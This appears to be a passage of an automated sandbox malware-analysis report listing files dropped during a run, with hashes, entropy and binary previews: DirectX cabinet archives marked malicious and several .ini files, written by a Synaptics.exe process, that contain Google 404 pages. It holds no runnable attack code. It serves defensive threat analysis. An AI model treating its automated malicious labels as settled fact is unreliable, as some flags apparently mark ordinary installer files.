                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Jun2007_d3dx10_34_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
                                                                                              Preview:MSCF.... .......D...............i#.......... ....#..............1....).........6.. .d3dx10_34_x86.cat.p)...).....6.. .d3dcompiler_34.dll.h...2S.....6.. .d3dx10_34.dll.I..........6.. .d3dx10_34_x86.inf.i..........6.. .d3dx10_34_x86_xp.inf.c...L......6.. .jun2007_d3dx10_34_x86.inf.....{5..CK.|.|......m:..s66...$.\.-K2...B....-.%..\...zI....-.@...!@..<Z(.@..B..@.?..'.k.......f.67;;;;3..gQi....O.7..F....J.m........".z.=.;9.s.D........P...PV.\.U.D......M...3.{K.k>...[z.u#Q...D,..%.%.$j,@wDT..D..]................8\.S.....X*......$....q..pP>.0.8.(q.IQ..;GGq.H.@...z.F...~(...=............W...9....._A.qtt.D:[.......7D...&..N..ee.J....H..LeS,e...CY....K m..9..\....._.e....E..@R..J)p..~e...I......uA..8<>).X.#....P..O.BN...a9#I})RW..J4P./.i.'..v.Po..5.+K...[..+K..2... `]....@............q.($. <B$...8@..b<." ...b.y..,.<..OK.."*..t..q...{^..5..l........J.(Q.o.Yn.]z.:x6.T..J.Z..zG........ .W..-..l.....2.\O..f/.......TJ&W"S$*.2.@.2.a.*....C.......A...{..!.|. ....UVJ7.#.\T..k..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Jun2008_d3dx10_38_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................#...............#..............=....$.........8wq..d3dx10_38.dll......$.....8wq..D3DCompiler_38.dll.f(..(......8.r..d3dx10_38_x86.cat.I..........8.r..d3dx10_38_x86.inf.i..........8.r..d3dx10_38_x86_xp.inf.c...@......8.r..Jun2008_d3dx10_38_x86.inf...E7%,..CK..\.....\./BS3...$.......p.&..x"........h....J.,5.,._.e....y..-y...#.......YXPP+..y.......y....o*.&..........\....i...YQcs..u.77K.8..h......h..]L...y6.bc..S.\.Y..]..aM.iyo.Xr..2....w...^V.Y.v)..s..w..;..z...........S..WY.b...!....q..W............y.~.x...P..!z.S.....2..{W.x.tJ.....Y....'o5"dE...(...|o.U'.tpJ....8..4.j.vT.+TrVWy.`.P..{![...O.<.!...F...V.........C.k.E.h._..AM..+...E.jG.U.R.F:.].E...Xvw.?....'..,....................A-p...l.[.J....4.. .$.,...`2X.W.c..=Y.>........i.....A-p.?.....`.8..qp.`...A.....P_1.....? ]O....A?P.&........%..c. ..v...,h.=...AK0........k......d..... ....A{....... .|o......&..|......0........d.....[m......X...%C.D.2X.....'&.4..@o......98.~..c

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Nov2007_d3dx10_36_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....,......D...............{#...........,...#..............8...h(........V7.. .d3dx10_36_x86.cat.....h(....L7.y .d3dcompiler_36.dll.h.... ....B7.O .d3dx10_36.dll.I.........V7P. .d3dx10_36_x86.inf.i...1.....V7P. .d3dx10_36_x86_xp.inf.c.........V7P. .nov2007_d3dx10_36_x86.inf..d.....CK..8.....Y..^(4cK.......H....0..F.]1..$.(W...P.-..J.).[*.%Q....M.v......>Os.c.......=.|.}..d*.r.5....q.s.J..*k8....y89....e...D...Q.!aL./,..l...@~N..J~..)...=..].)......o.@.... ......,R...".@&L.i..........Z.6`..C.......]6.Z.._V..J T.B......l......,..t.6.....md.p..5...l.....B...aI,.F.mU..<T...@Hf.......d{..... ..1.0$.....j.AE..#'..'.%..%....4..p..P.g%..(.H..d..........R#..L..H. mXq..c......6tU$....cii.e............1dA...f.... .........U.B..b.....Fj.z;x...f2. gY.....9.u24. .O&....!E-.....R.d+...5.b..![.dG.....""{U.C...........9p.M....Y|.\f......E....).J...d..0.l.A......0$.....}....e......t..^W..LM(.$,... +.....A..K...f.p..dD...,..E2n..2/k-...d.E2.-.@.S...1.........pA..H..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Nov2008_d3dx10_40_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................"..............#..............M...X.........O9.2..d3dx10_40.dll.`...X.....O9.2..D3DCompiler_40.dll.......%...O9p:..d3dx10_40_x86.cat.I...g.&...O9h8..d3dx10_40_x86.inf.i.....&...O9h8..d3dx10_40_x86_xp.inf.c.... &...O9h8..Nov2008_d3dx10_40_x86.inf....X.0..CK..T...{..J........D...$.....$.2.....&L+...u..Q.5#f...W].9cN...w..Qd...y.......9~.}..]u+tOMM...r.].a.O..f7#.\........m.l._a.[..,4Q.&KU...c.eq1))*.,V!S...)2...Y.*^a.Q..b........y_x.W..Q^J^.j..P..gB.*..<w....E_).$j..q.|y..{.'....1V-..N.bt..%...A.0K....u...O...K.u.F.H(u>.X.vbd.......)..Ltg)c.a..J..|.V).N.F`G.Lxk..Rf.-.<1b...0..y...*y!.g..F1Z.v..T..o......i.............!Jku.:..i...e.....Z.HR.0...6.....zk1..._.-.L....a).Gx.).........@6...........P.\....?`.....f...|.r......L9......S.T ........o:J.'.E`?..x..?...$........z.......,.<.'..D.j .....G...3...G;.......p...&@W...;....^........R .X.....L ............-...........'.r`7........)........=......r..j,e..j.)..........uX)..p.B...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\dxupdate[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100360
                                                                                              Entropy (8bit):7.9900557178400815
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
                                                                                              MD5:4AFD7F5C0574A0EFD163740ECB142011
                                                                                              SHA1:3EBCA5343804FE94D50026DA91647442DA084302
                                                                                              SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
                                                                                              SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
                                                                                              Malicious:true
                                                                                              Preview:MSCF....8d......D...............R...........8d...#............................~>.%..dxupdate.dll.02........h=...dxupdate.inf.1...0.....~>.%..dxupdate.cif.T....'..CK.Z}.$.U....;..@.e!.#....G===.=+".?..+.s..l8....o.{....;.+..(...d,..HVd..,......(..[&H.........Y.Y..~..{.gv.vW.'.....^......^...}...1v....2.*.~.......y...a_.....^Z..V?H.Q..bo(..0.Ra...q(..`o....W.....4~...q.?...F.............].....~c...O7^..W..x.?...l.=.~$......'..o;.._.....'u.aK......=..X.........g........~.].[..+..\b._........p.=.....w...%..@.o-.....O2..w...~sn..D_:....G).../e.Q_/....=Y.x........p.0..^....w...A}..'..... ...P.7....3.av...?...Kl.......>t...O`..b.]....x..Y....._...x..}....@.....1.9.o....[.?.......)...g..'.1.i../.^.|..=........x...L.6`...>..,...K./....6...........A.#.?.8.|....?.|......w%K.>@..(.I...9.../....].....%v7.>.....-@.p....E........6...Kc..p?@.....8.|.p/..xg...7...^.(..7..X~?..........#...w...q..U....f.... ..?<.\...}.K.Z.,]+...../..-......e...aO....a9Y......Wg.

                                                                                              C:\Users\user\AppData\Local\Temp\1lDgSTv.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.264124419550009
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0DTDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+oTD+pAZewRDK4mW
                                                                                              MD5:A0C38341A19C34FA6A9C3F4CF6DB3A8E
                                                                                              SHA1:29A9141DB639EB498037F3EA18C46EB41C352961
                                                                                              SHA-256:0DFFCFC94CD2035555F871966F045DACBF79D9392BC57D571BD845939BBD5CC5
                                                                                              SHA-512:3BA94371489DD3FE73572CBED8E7BFF599827CA21C63DA4862F111E973635150D4706A9891C4306FDC0E31B127540CF283B7EDBB78157792484EA3311BA0D327
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aFAT_vy3uwT3mQLAtGPj7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\1tu6MFR.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.263262272541129
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0P/SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                              MD5:63580A11621D357D877F96A356D5331E
                                                                                              SHA1:FE5307ECB194EFA4526C9405263B4C88247FEA32
                                                                                              SHA-256:84B8759C772884E5F0D029C18409A1E5BCACFAB7B89263CB452EB8ABFFEC5295
                                                                                              SHA-512:093D5744D5B91873069458E3E596E9BE5336892AEDEF3CD62B4E5456BCBD87DF9A06E341F738EEACAE852901C06BCFAAD76443A324EBAA37AE1159E21AC07016
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AmI2fsV228dHk7_FzMoXZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\4pNVHtb.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.270873845556429
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0JipDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+bt+pAZewRDK4mW
                                                                                              MD5:FE0F54084DFCF5416524DFC1A17CFB5E
                                                                                              SHA1:5C10BAAF56B451DCECC83F5D7270666B10A45C77
                                                                                              SHA-256:664193DCC141A713A70EBF5007DCC0027EA24E9DA223CE62FF21FF3659F1BEEA
                                                                                              SHA-512:560A4F71DDB4CDA6713E0346F8C1FB03FC666B405FDB1E17B4180E7C55C458391C8339465908825E9A1F6E5AE181FC276C40C385C252FCB0CE72BD368463ACC8
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KBiXYXOu7BOK-KN8RebfCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\5b8A3xI.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.265414818735961
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0UZLIWDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5um+pAZewRDK4mW
                                                                                              MD5:FEACFEC8BFE34BDB93AFCBD86C11F5B8
                                                                                              SHA1:75A89EE0D2B2F65AF76F6D5F3390FF177BEFFF66
                                                                                              SHA-256:705CB2D940DE65BBC4410C6EE351090FE42FB3A8CDD23A7EA2BC7F32E9919DDF
                                                                                              SHA-512:E5908665B6167AB078D2CA7CD3FA79CDFA598963595AE2A97D33CFA0EB63DF1C621851D3CBF9911AEEECE1F2334E0AFDFC8E0D874B84F10F250C589FDEB45ADC
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0QEiz-ldSzXeHAkC1yJYdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\5qhqwIb.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.255202908664148
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0ZfSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+if+pAZewRDK4mW
                                                                                              MD5:235FD0D0DA40D7944F86F90546C50C38
                                                                                              SHA1:D598538334CED174B076B5392E7BD724145C1C93
                                                                                              SHA-256:A6CACEA3ED0D0206F031CADB7731BA042BE81265204353D77AE5EAFCBAC0A58B
                                                                                              SHA-512:A2BCB53BC36A027865A047C7F2F9399B7A512D93591D0A48556E8C0E8CBBB83FFA154B1CFDF8510D48DC99BFC0ED9D7F6B320FCECD0CF11DBFD310107CCAB0AD
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JZ1uvvUvqJEaLzHwncopvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\7Fx9stE.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.285928542759019
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0k6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D6+pAZewRDK4mW
                                                                                              MD5:CA3D614299D97087F4A410AB6C4FC537
                                                                                              SHA1:4632F7863AB78357DFE83F50B827848AC13EACB6
                                                                                              SHA-256:F23B8EEC37E8EBBF7CBD3F86F6C12A9ED7B0E9DD8236FE6581A450E2062D2C4F
                                                                                              SHA-512:DE11A400C73859C180215F9A2C0CD2E0DB224FCB0C6A2F3455D3D05587945BE8C04B9FF63DF540ECF9A9C9F6DBDAAAAB5C8FBF6C5C813F8C5817DA75F542862C
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QIDIchTkJU0jKDSHOyUXBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\7XUCdQQ.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.256116967057826
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0oSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v+pAZewRDK4mW
                                                                                              MD5:8DE5A75202A27B08EEBC4E6CB400A636
                                                                                              SHA1:6A6A0E676CCA81E2C6A7C2CA1D221C7766582D97
                                                                                              SHA-256:4F7047EE7850F1CEA553AC47ED2DD0FB4DC80D34C2590824C99AA4138372741D
                                                                                              SHA-512:973D09580E80DE9103F64DABF30563C1530DBD0781485AE13AC955E20ABDAED44754108AA7921216A452947E7A0D7837B26F2071D92BE7E2F54D971E19C0019C
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="m3D3VrBLkLxzN7chln11jw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\7w4aaRj.ini

                                                                                              Download File
                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1652
                                                                                              Entropy (8bit):5.270523977844735
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:GgsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                              MD5:8014E63EE4368FD76F53BA8A8D356ABE
                                                                                              SHA1:E3AF313E78453755944311F1841BE6D70F80A5DA
                                                                                              SHA-256:F0937A65392E75CC303FBD9CAA7A6CB4A3A5849848A1F4907FD7634547532B16
                                                                                              SHA-512:D0B0C5782C2FE6AD553878A8A1EDF9AD08D81805D77895A03B7E0064E482C30C81DD56C2F19D5B493785917FC73B26C6E8ECA536A381CABE4B7F184B77DD04CE
                                                                                              Malicious:false
                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9NOggwHqaCfb8rF8zIVLSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                              C:\Users\user\AppData\Local\Temp\8bTYQVA.ini

